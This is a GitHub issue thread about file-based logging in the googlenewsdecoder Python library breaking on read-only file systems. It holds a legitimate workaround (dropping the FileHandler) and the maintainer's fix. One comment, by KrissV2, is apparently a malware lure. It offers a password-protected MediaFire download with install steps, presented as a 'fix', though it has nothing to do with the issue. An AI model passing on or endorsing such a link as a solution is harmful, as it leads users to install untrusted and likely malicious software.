### ISSUE TITLE
Request to Remove setup_logging() Function or Modify Logging Setup with a read-only file system

### ISSUE THREAD

**Issue by sunilthakan** [SSujitX/google-news-url-decoder#9]
The recent changes in the googlenewsdecoder library introduced a setup_logging() function in new_decoderv1 that configures logging to write to a file (e.g., google_news_new_decoderv1.log). This change causes issues in environments with a read-only file system. Removing or modifying the file-based logging setup will improve compatibility and prevent runtime errors in environments with restricted file access, making the library more versatile.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by SSujitX** [comment]
> The recent changes in the googlenewsdecoder library introduced a setup_logging() function in new_decoderv1 that configures logging to write to a file (e.g., google_news_new_decoderv1.log). This change causes issues in environments with a read-only file system. Removing or modifying the file-based logging setup will improve compatibility and prevent runtime errors in environments with restricted file access, making the library more versatile.

okay in next updates.

**Comment by L-ENA** [comment]
I ran into this issue when using your super helpful and amazing library on a Streamlit app. For me it helped to simply remove the logging.FileHandler(log_file) from the handlers list in the setup_logging function. It now only contains the logging.StreamHandler() which is fine for my purposes. Thanks for looking into this!

```def setup_logging(log_file):
    logging.basicConfig(
        level=logging.ERROR,
        format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
        handlers=[logging.StreamHandler()],#removing logging.FileHandler(log_file) from the handlers list

    )

**Comment by SSujitX** [comment]
Removed logging, thanks.

> The recent changes in the googlenewsdecoder library introduced a setup_logging() function in new_decoderv1 that configures logging to write to a file (e.g., google_news_new_decoderv1.log). This change causes issues in environments with a read-only file system. Removing or modifying the file-based logging setup will improve compatibility and prevent runtime errors in environments with restricted file access, making the library more versatile.
